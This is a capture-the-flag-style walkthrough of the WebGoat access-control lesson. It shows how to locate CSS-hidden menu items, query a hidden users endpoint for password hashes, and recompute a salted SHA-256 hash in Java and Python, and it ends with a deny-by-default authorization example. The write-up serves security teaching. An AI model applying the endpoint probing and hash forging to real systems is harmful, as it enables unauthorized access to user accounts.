In this walkthrough, we will be going through the Missing Function Level Access Control section of the WebGoat labs. We will explore and exploit Missing Function Level Access Control and see how applications are affected by it: a function that is merely hidden from the UI is still reachable by anyone who knows or guesses its URL. So, let's get started with the hacking without any delay.
Table of Contents
Missing Function Level Access Control
1. Relying on obscurity
- In this task we have to find two invisible menu items in the menu; they will be useful for the later tasks in this challenge.
- I used the browser DevTools inspector and found the hidden menu items. They are only hidden by client-side styling, so they are still present in the page's DOM, and their endpoints still exist on the server.
2. Gathering User Info
- In this task we have to find the hash of user Jerry's account, taking hints and input from the previous task: one of the hidden menu items pointed at a users endpoint.
- I intercepted the request with Burp Suite, changed the method to GET, set the target URL to the users endpoint and the Content-Type header to application/json. The response was a JSON listing of the users, including each user's hash.
3. The company fixed the problem, right?
- In this task, the company has found the vulnerable endpoint and shipped an emergency fix for it. I tried the previous technique on the new endpoint; it still returned a response, but the hash it contained was no longer the correct solution.
- I peeked into the application source code and found Jerry's password stored in plain text. Further, the application now uses a different salt for the admin accounts, "DeliberatelyInsecure1235". The hash is then built by concatenating the password, the salt and the username (in that order), hashing the result with SHA-256, and Base64-encoding the digest. Note that SHA-256 is a hash, not encryption: with the password, salt and username known, anyone can recompute it, which is exactly what we do next.
- Now that we know that, let’s use the below program to generate our desired hash.
```java
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.util.Base64;

public class App {
    public static void main(String[] args) throws Exception {
        // Jerry's plain-text password, as found in the application source
        String password = "doesnotreallymatter";
        String username = "Jerry";
        // The salt the "fixed" endpoint now uses for admin accounts
        String passwordSaltStrong = "DeliberatelyInsecure1235";

        // SHA-256 over password + salt + username, then Base64 (the order matters)
        MessageDigest md = MessageDigest.getInstance("SHA-256");
        String salted = password + passwordSaltStrong + username;
        byte[] hash = md.digest(salted.getBytes(StandardCharsets.UTF_8));
        System.out.println(Base64.getEncoder().encodeToString(hash));
    }
}
```

Output:

d4T2ahJN4fWP83s9JdLISio7Auh4mWhFT1Q38S6OewM=
- Submit it to complete the challenge.
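The three steps above as one offline-runnable script, added here as an example (not WebGoat's own code and not the program from the write-up): finding links the page hides only client-side, building the GET request to the users endpoint with the JSON content type, and recomputing the hash with the admin salt. The URL paths, the session cookie, the role of "Tom" as a second user and the JSON field names (`username`, `userHash`) are assumptions, as is the sample menu fragment, which is constructed to look like the lesson page.

```python
"""Added example (not WebGoat's own code): the lesson's three steps as one
offline-runnable script. URL paths, the session cookie and the JSON field
names (username / userHash) are assumptions, not taken from the write-up."""
import base64
import hashlib
import json
import urllib.request
from html.parser import HTMLParser

ADMIN_SALT = "DeliberatelyInsecure1235"  # the salt the write-up found in the fixed source

# --- Step 1: find menu items the page hides client-side -------------------
# Constructed menu fragment in the shape of the lesson page: the "Users" and
# "Config" entries are hidden by a CSS class, so they never render, but they
# are still in the DOM (and their endpoints still exist on the server).
SAMPLE_MENU_HTML = """
<ul class="nav">
  <li><a href="/access-control/start">Start</a></li>
  <li class="hidden-menu-item"><a href="/access-control/users">Users</a></li>
  <li class="hidden-menu-item"><a href="/access-control/config">Config</a></li>
</ul>
"""

VOID_TAGS = {"br", "img", "input", "hr", "meta", "link"}  # no closing tag, so never pushed


class HiddenLinkFinder(HTMLParser):
    """Collect hrefs of links nested inside an element hidden by class, style or attribute."""

    def __init__(self):
        super().__init__()
        self.stack = []   # one hidden/visible flag per open element
        self.found = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        classes = (a.get("class") or "").lower().split()
        style = (a.get("style") or "").replace(" ", "").lower()
        hidden = (any("hidden" in c for c in classes)
                  or "display:none" in style
                  or "hidden" in a)          # bare `hidden` attribute
        if tag in VOID_TAGS:
            return
        self.stack.append(hidden)
        if tag == "a" and a.get("href") and any(self.stack):
            self.found.append(a["href"])    # link lives inside a hidden ancestor

    def handle_endtag(self, tag):
        if self.stack:
            self.stack.pop()


def find_hidden_links(html):
    p = HiddenLinkFinder()
    p.feed(html)
    return p.found


# --- Step 2: call the hidden endpoint directly ----------------------------
def build_users_request(base_url, path="/access-control/users", session_cookie=None):
    """The request the write-up crafts in Burp: GET, JSON content type, sent
    straight to the users endpoint. Built but not sent, so it can be inspected.
    `path` is an assumed value, not taken from the write-up."""
    headers = {"Content-Type": "application/json", "Accept": "application/json"}
    if session_cookie:
        headers["Cookie"] = session_cookie   # e.g. "JSESSIONID=..." from the logged-in browser
    return urllib.request.Request(base_url.rstrip("/") + path, headers=headers, method="GET")


def fetch_users(req):
    """Send the request and parse the JSON listing (needs a running WebGoat)."""
    with urllib.request.urlopen(req, timeout=10) as resp:
        return json.load(resp)


def hash_for_user(users, username, name_field="username", hash_field="userHash"):
    """Pick one user's hash out of the listing; the field names are assumptions."""
    for u in users:
        if u.get(name_field) == username:
            return u.get(hash_field)
    return None


# --- Step 3: recompute the hash for the "fixed" endpoint --------------------
def user_hash(password, salt, username):
    """Same scheme as the page's Java program: SHA-256 over
    password + salt + username, Base64-encoded. The concatenation order
    matters; swapping it gives a different digest."""
    salted = (password + salt + username).encode("utf-8")
    return base64.b64encode(hashlib.sha256(salted).digest()).decode("ascii")


# Constructed listing standing in for the endpoint's JSON; the hashes are
# computed the way the fixed lesson does (admin salt), so steps 2 and 3 agree.
SAMPLE_USERS = [
    {"username": "Tom", "admin": False,
     "userHash": user_hash("doesnotreallymatter", ADMIN_SALT, "Tom")},
    {"username": "Jerry", "admin": False,
     "userHash": user_hash("doesnotreallymatter", ADMIN_SALT, "Jerry")},
]

if __name__ == "__main__":
    print("hidden links:", find_hidden_links(SAMPLE_MENU_HTML))
    req = build_users_request("http://localhost:8080/WebGoat")
    print(req.get_method(), req.full_url, req.header_items())
    print("Jerry (listing):   ", hash_for_user(SAMPLE_USERS, "Jerry"))
    print("Jerry (recomputed):", user_hash("doesnotreallymatter", ADMIN_SALT, "Jerry"))
```

Against a live instance you would pass the browser's session cookie to `build_users_request` and feed the result of `fetch_users` into `hash_for_user`; everything else runs offline. The point of `user_hash` is the one the lesson makes: a static, source-visible salt plus a plain-text password is not a secret, so the "fix" only changed which value the attacker has to recompute.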
Conclusion:
So, we have completed the WebGoat Missing Function Level Access Control section. These attacks are mitigated by denying access to every function by default and then explicitly granting each role access to the specific functions it needs, with that check enforced on the server for every request rather than in the menu. Along with that, the application must not expose sensitive information (such as password hashes, salts or plain-text credentials) in the front end, in responses or in shipped source, because it will be used against it later, and hiding a function from the UI must never be treated as access control. On that note, I will take your leave and will meet you in the next one with another WebGoat vulnerability write-up; till then, "Keep Hacking".
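The mitigation the conclusion describes, as an added example (not WebGoat's code): a minimal request dispatcher in its obscurity-only form beside a deny-by-default form that grants functions per role. The paths, the role names `WEBGOAT_USER` / `WEBGOAT_ADMIN` and the handler bodies are assumptions made for the example.

```python
"""Added example (not WebGoat's code): function-level access control done
wrong (menu hidden, endpoint open) and done right (deny by default, explicit
grants per role, checked server-side on every call). Paths and role names
are assumptions."""
from dataclasses import dataclass


@dataclass(frozen=True)
class IncomingRequest:
    path: str
    role: str   # resolved from the server-side session, never from client input


# Assumed handlers; the users listing is the sensitive function from the lesson.
USERS_LISTING = [{"username": "Jerry", "userHash": "<redacted>"}]


def list_users():
    return 200, USERS_LISTING


def start_lesson():
    return 200, "lesson"


HANDLERS = {
    "/access-control/start": start_lesson,
    "/access-control/users": list_users,
}


def dispatch_obscurity(req):
    """Vulnerable: the only 'protection' is that the menu entry is hidden in
    the HTML. The route itself is served to any role that asks for it."""
    handler = HANDLERS.get(req.path)
    if handler is None:
        return 404, None
    return handler()


# Explicit grants: a role may call only the functions listed for it.
# Anything absent here (unknown role, unknown path, new route added later
# and forgotten) is denied, which is what "deny by default" buys you.
GRANTS = {
    "WEBGOAT_USER": frozenset({"/access-control/start"}),
    "WEBGOAT_ADMIN": frozenset({"/access-control/start", "/access-control/users"}),
}


def authorized(role, path):
    return path in GRANTS.get(role, frozenset())


def dispatch_deny_by_default(req):
    """Fixed: the authorization check runs before any handler, for every path.
    Denied requests get the same 403 whether or not the path exists, so the
    response does not help an attacker enumerate hidden functions."""
    if not authorized(req.role, req.path):
        return 403, None
    handler = HANDLERS.get(req.path)
    if handler is None:
        return 404, None
    return handler()


if __name__ == "__main__":
    for fn in (dispatch_obscurity, dispatch_deny_by_default):
        for role in ("WEBGOAT_USER", "WEBGOAT_ADMIN", "guest"):
            status, body = fn(IncomingRequest("/access-control/users", role))
            print(f"{fn.__name__:26s} {role:14s} -> {status} {body}")
```

The difference to look for is where the decision is made: in the first dispatcher nothing between the URL and `list_users` ever looks at the caller, so removing the menu entry changes nothing for a client that types the path. In the second, the grant table is the single place that says who may call what, and a route that is not in it is unreachable no matter how it was discovered.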